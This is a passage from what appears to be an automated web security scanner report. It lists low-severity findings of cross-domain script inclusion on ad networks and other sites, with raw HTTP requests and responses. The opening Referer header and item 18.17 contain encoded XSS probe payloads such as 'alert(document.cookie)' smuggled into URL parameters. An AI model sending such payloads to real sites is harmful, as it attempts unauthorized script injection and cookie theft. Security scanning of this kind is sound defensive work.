Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=300x250_as&output=html&h=250&w=300&lmt=1296698959&channel=3510583841&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dside%26rand%3D6382924&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677358999&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as&correlator=1296677358676&frm=0&adk=3794557511&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=2&dtd=24&xpc=gTmsrpKGsX&p=http%3A//boardreader.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

18.6. http://ad.doubleclick.net/adi/N3285.msn-dm/B2343920.67 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3285.msn-dm/B2343920.67

Issue detail

The response dynamically includes the following script from another domain:

http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

18.7. http://ad.doubleclick.net/adi/N3466.8451.ORBITZLLC/B4967866.3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3466.8451.ORBITZLLC/B4967866.3

Issue detail

The response dynamically includes the following script from another domain:

http://s1.2mdn.net/879366/flashwrite_1_2.js

Request

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Tue, 01 Feb 2011 15:27:05 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: id=22be9a760c01001c||t=1296574025|et=730|cs=qidqaf6e; expires=Thu, 31-Jan-2013 15:27:05 GMT; path=/; domain=.doubleclick.net
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Content-Length: 6668

<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;">

<script src="http://s1.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

18.8. http://ad.doubleclick.net/adi/N3466.8451.ORBITZLLC/B4967866.3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3466.8451.ORBITZLLC/B4967866.3

Issue detail

The response dynamically includes the following script from another domain:

http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Tue, 01 Feb 2011 15:23:12 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: id=2244e57c0c01002a||t=1296573792|et=730|cs=pkhwecaq; expires=Thu, 31-Jan-2013 15:23:12 GMT; path=/; domain=.doubleclick.net
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Content-Length: 6715

<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;">

<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

18.9. http://ad.doubleclick.net/adi/N4406.Orbitzcom/B5147944.11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4406.Orbitzcom/B5147944.11

Issue detail

The response dynamically includes the following script from another domain:

http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

18.10. http://ad.doubleclick.net/adi/N4406.Orbitzcom/B5147944.4 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4406.Orbitzcom/B5147944.4

Issue detail

The response dynamically includes the following script from another domain:

http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

18.11. http://ad.doubleclick.net/adi/N4406.Orbitzcom/B5147944.5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4406.Orbitzcom/B5147944.5

Issue detail

The response dynamically includes the following script from another domain:

http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

18.12. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N6036.149339.MICROSOFTONLINE/B5123903.5

Issue detail

The response dynamically includes the following script from another domain:

http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

18.13. http://ad.doubleclick.net/adi/dmd.ehow/computers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/dmd.ehow/computers

Issue detail

The response dynamically includes the following script from another domain:

http://ad.yieldmanager.com/st?ad_type=ad&ad_size=300x250&entity=58661&site_code=computers&section_code=&click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa2/3/0/%2a/v%3B228957569%3B0-0%3B0%3B45421603%3B4307-300/250%3B38375088/38392845/1%3B%3B%7Eaopt%3D2/0/36/0%3B%7Esscs%3D%3f

Request

Response

18.14. http://ad.doubleclick.net/adi/dmd.ehow/homepage previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/dmd.ehow/homepage

Issue detail

The response dynamically includes the following script from another domain:

http://ad.yieldmanager.com/st?ad_type=ad&ad_size=300x250&entity=58661&site_code=homepage&section_code=&click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa2/3/0/%2a/n%3B228957569%3B0-0%3B0%3B45421688%3B4307-300/250%3B38375088/38392845/1%3B%3B%7Eaopt%3D2/0/36/0%3B%7Esscs%3D%3f

Request

Response

18.15. http://ad.yieldmanager.com/iframe3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/iframe3

Issue detail

The response dynamically includes the following script from another domain:

http://ad-emea.doubleclick.net/adj/N5506.150290.INVITEMEDIA/B5070033;abr=!ie;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838?

Request

Response

18.16. http://ad.yieldmanager.com/iframe3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/iframe3

Issue detail

The response dynamically includes the following script from another domain:

http://ad-emea.doubleclick.net/adj/N5506.150290.INVITEMEDIA/B5070033.24;abr=!ie;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628?

Request

Response

18.17. http://ad.yieldmanager.com/iframe3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/iframe3

Issue detail

The response dynamically includes the following script from another domain:

http://ad-emea.doubleclick.net/adj/N5506.150290.INVITEMEDIA/B5070033;abr=!ie;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B0579cac1bb9e663e%3B12de70019af,0%3B%3B%3B2909974716,NwQAAJTyAgAptXQAAAAAACzLHQAAAAAAAAAUAAIAAAAAAAgAAQAECgB3HgAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOrwEAAAAAAAIAAwAAAAAArxkA5y0BAAAAAAAAADg2OGRiNTFjLTJlZTEtMTFlMC04NWY4LTAwMzA0OGQ2ZDg5ZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepagee1c21%2522__________script_____alert%281%29_____%2Fscript_____57155bc0307%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Btile%3D2%3Bord%3D2735259747132%3F,$http://t.invitemedia.com/track_click?auctionID=1296660699193172-73583&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepagee1c21%2522%5F%5F%5F%5F%5F%5F%5F%5F%5F%5Fscript%5F%5F%5F%5F%5Falert%281%29%5F%5F%5F%5F%5F%2Fscript%5F%5F%5F%5F%5F57155bc0307%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Btile%3D2%3Bord%3D2735259747132%3F&redirectURL=;ord=1296660699?

Request

Response

18.18. http://adadvisor.net/adscores/g.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adadvisor.net
Path:	/adscores/g.js

Issue detail

The response dynamically includes the following scripts from other domains:

http://pixel.invitemedia.com/pixel?key=segment&returnType=js&partnerID=15&code=000&code=Y&code=&code=G000
http://pixel.invitemedia.com/pixel?key=segment&returnType=js&partnerID=196&code=0
http://segment-pixel.invitemedia.com/pixel?code=0&clientID=2064&key=segment&returnType=js
http://segment-pixel.invitemedia.com/pixel?pixelID=0&partnerID=134&clientID=2540&key=segment&returnType=js
http://segment-pixel.invitemedia.com/pixel?pixelID=0&partnerID=77&clientID=1769&key=segment&returnType=js

Request

Response

18.19. http://amihackerproof.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amihackerproof.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://code.jquery.com/jquery-latest.js

Request

GET / HTTP/1.1
Host: amihackerproof.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.20. https://amihackerproof.com/about_us.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://amihackerproof.com
Path:	/about_us.php

Issue detail

The response dynamically includes the following script from another domain:

http://code.jquery.com/jquery-latest.js

Request

GET /about_us.php HTTP/1.1
Host: amihackerproof.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 16:17:27 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 12499

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="SHORTCUT ICON" href="http://www.tjfennerandassociates.org/favicon.ico">
<title>Am I Hacker Proof?</title>

...[SNIP]...
<link href="../jordan%20taylor/sft.css" rel="stylesheet" type="text/css">
<script language="javascript" src="http://code.jquery.com/jquery-latest.js"></script>
...[SNIP]...

18.21. http://autospies.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://autospies.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://kona.kontera.com/javascript/lib/KonaLibInline.js
http://static.fmpub.net/site/autospies
http://static.fmpub.net/zone/226
http://static.fmpub.net/zone/227
http://www.google-analytics.com/urchin.js

Request

GET / HTTP/1.1
Host: autospies.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 14:31:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public, max-age=956
Expires: Tue, 01 Feb 2011 14:47:54 GMT
Last-Modified: Tue, 01 Feb 2011 14:27:54 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 99031

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
   <title>AutoSpies - Detroit Auto Show, New York Auto Show, SEMA Auto Show, Auto News, Re
...[SNIP]...

                           <script type='text/javascript' src='http://static.fmpub.net/zone/226'></script>
...[SNIP]...

               <script type='text/javascript' src='http://static.fmpub.net/zone/227'></script>
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/autospies'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.22. http://autospies.com/news/recent.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://autospies.com
Path:	/news/recent.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://kona.kontera.com/javascript/lib/KonaLibInline.js
http://static.fmpub.net/site/autospies
http://static.fmpub.net/zone/226
http://www.google-analytics.com/urchin.js

Request

GET /news/recent.aspx HTTP/1.1
Host: autospies.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 14:31:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public, max-age=1153
Expires: Tue, 01 Feb 2011 14:51:12 GMT
Last-Modified: Tue, 01 Feb 2011 14:31:12 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 62303

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>


               <link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
   <
...[SNIP]...

                           <script type='text/javascript' src='http://static.fmpub.net/zone/226'></script>
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/autospies'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.23. http://bassistance.de/jquery-plugins/jquery-plugin-accordion/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bassistance.de
Path:	/jquery-plugins/jquery-plugin-accordion/

Issue detail

The response dynamically includes the following script from another domain:

http://twitter.com/statuses/user_timeline/bassistance.json?callback=twitterCallback&count=3&named_obj

Request

GET /jquery-plugins/jquery-plugin-accordion/ HTTP/1.1
Host: bassistance.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:32:04 GMT
Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g
Vary: Cookie,Accept-Encoding
X-Pingback: http://bassistance.de/xmlrpc.php
WP-Super-Cache: Served legacy cache file
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 489932

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
</h2>

<script type="text/javascript" src="http://twitter.com/statuses/user_timeline/bassistance.json?callback=twitterCallback&count=3&named_obj"></script>
...[SNIP]...

18.24. http://blekko.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://a.blekko-img.com/045/gz/78f7e6ce9fb86183_search.js
http://a.blekko-img.com/045/gz/c096e0b5cfcc911c_blekko.js

Request

Response

18.25. http://blekko.com/likes-info previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/likes-info

Issue detail

The response dynamically includes the following scripts from other domains:

http://a.blekko-img.com/045/2d59ccdc20e73672_jquery.json-2.2.min.js
http://a.blekko-img.com/045/78f7e6ce9fb86183_search.js
http://a.blekko-img.com/045/c096e0b5cfcc911c_blekko.js

Request

GET /likes-info HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:40:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:40:56 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 21857
X-Blekko-PT: aedeb63fa2494acf50dacd0d3bc8a4d8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
</script>
<script type="text/javascript" src="http://a.blekko-img.com/045/c096e0b5cfcc911c_blekko.js"></script>
<script type="text/javascript" src="http://a.blekko-img.com/045/2d59ccdc20e73672_jquery.json-2.2.min.js"></script>
<script type="text/javascript" src="http://a.blekko-img.com/045/78f7e6ce9fb86183_search.js"></script>
...[SNIP]...

18.26. http://blekko.com/tag/show previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/tag/show

Issue detail

The response dynamically includes the following scripts from other domains:

http://a.blekko-img.com/045/330d4b61aa73c032_jquery.dump.js
http://a.blekko-img.com/045/78f7e6ce9fb86183_search.js
http://a.blekko-img.com/045/c096e0b5cfcc911c_blekko.js

Request

GET /tag/show HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:41:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:41:13 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 123431
X-Blekko-PT: 2bb77fc2ffb76301bdfaaa7c09d81984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
</script>
<script type="text/javascript" src="http://a.blekko-img.com/045/c096e0b5cfcc911c_blekko.js"></script><script type="text/javascript" src="http://a.blekko-img.com/045/330d4b61aa73c032_jquery.dump.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://a.blekko-img.com/045/78f7e6ce9fb86183_search.js"></script>
...[SNIP]...

18.27. http://blekko.com/toolbar previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/toolbar

Issue detail

The response dynamically includes the following scripts from other domains:

http://a.blekko-img.com/045/2d59ccdc20e73672_jquery.json-2.2.min.js
http://a.blekko-img.com/045/78f7e6ce9fb86183_search.js
http://a.blekko-img.com/045/c096e0b5cfcc911c_blekko.js

Request

GET /toolbar HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:40:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:40:58 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 21698
X-Blekko-PT: d3357d8cd5c182a48fbfffb7bd3c1527

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
</script>
<script type="text/javascript" src="http://a.blekko-img.com/045/c096e0b5cfcc911c_blekko.js"></script>
<script type="text/javascript" src="http://a.blekko-img.com/045/2d59ccdc20e73672_jquery.json-2.2.min.js"></script>
<script type="text/javascript" src="http://a.blekko-img.com/045/78f7e6ce9fb86183_search.js"></script>
...[SNIP]...

18.28. http://blekko.com/ws/+/adsense=6316080006029695 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/adsense=6316080006029695

Issue detail

The response dynamically includes the following scripts from other domains:

http://a.blekko-img.com/045/2d59ccdc20e73672_jquery.json-2.2.min.js
http://a.blekko-img.com/045/78f7e6ce9fb86183_search.js
http://a.blekko-img.com/045/c096e0b5cfcc911c_blekko.js

Request

GET /ws/+/adsense=6316080006029695 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:38:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:38:46 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 86148
X-Blekko-QF: hq
X-Blekko-PT: 24d414955e63b547c37c2c386101fe7f

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
</script>
<script type="text/javascript" src="http://a.blekko-img.com/045/c096e0b5cfcc911c_blekko.js"></script>
<script type="text/javascript" src="http://a.blekko-img.com/045/2d59ccdc20e73672_jquery.json-2.2.min.js"></script>
<script type="text/javascript" src="http://a.blekko-img.com/045/78f7e6ce9fb86183_search.js"></script>
...[SNIP]...

18.29. http://blekko.com/ws/+/ip=82.165.200.22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/ip=82.165.200.22

Issue detail

The response dynamically includes the following scripts from other domains:

http://a.blekko-img.com/045/2d59ccdc20e73672_jquery.json-2.2.min.js
http://a.blekko-img.com/045/78f7e6ce9fb86183_search.js
http://a.blekko-img.com/045/c096e0b5cfcc911c_blekko.js

Request

GET /ws/+/ip=82.165.200.22 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:38:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:38:52 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 62054
X-Blekko-QF: hq
X-Blekko-PT: 6a991d03f14ada9325415e7a83526ca1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
</script>
<script type="text/javascript" src="http://a.blekko-img.com/045/c096e0b5cfcc911c_blekko.js"></script>
<script type="text/javascript" src="http://a.blekko-img.com/045/2d59ccdc20e73672_jquery.json-2.2.min.js"></script>
<script type="text/javascript" src="http://a.blekko-img.com/045/78f7e6ce9fb86183_search.js"></script>
...[SNIP]...

18.30. http://blekko.com/ws/+/press-videos previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/press-videos

Issue detail

The response dynamically includes the following scripts from other domains:

http://a.blekko-img.com/045/2d59ccdc20e73672_jquery.json-2.2.min.js
http://a.blekko-img.com/045/78f7e6ce9fb86183_search.js
http://a.blekko-img.com/045/c096e0b5cfcc911c_blekko.js
http://player.ooyala.com/player.js?embedCode=90cmtrMTom9vae2YoUwJrngW3UCgI2Zu&height=310&deepLinkEmbedCode=90cmtrMTom9vae2YoUwJrngW3UCgI2Zu&width=551
http://player.ooyala.com/player.js?embedCode=l4dmtrMTrlyjsC41_mk1jkhPs2NJ1KeA&height=310&deepLinkEmbedCode=l4dmtrMTrlyjsC41_mk1jkhPs2NJ1KeA&width=551

Request

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:37:19 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:37:19 GMT
Cache-Control: private, max-age=86400
Expires: Thu, 03 Feb 2011 19:37:19 GMT
Content-Length: 24116
X-Blekko-PT: e31ce24bc17eed8e1c377cf0a001c06d

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<div id="vid_2" style="display: none;">
<script src="http://player.ooyala.com/player.js?embedCode=l4dmtrMTrlyjsC41_mk1jkhPs2NJ1KeA&height=310&deepLinkEmbedCode=l4dmtrMTrlyjsC41_mk1jkhPs2NJ1KeA&width=551"></script>
...[SNIP]...
<div id="vid_3" style="display: none;">
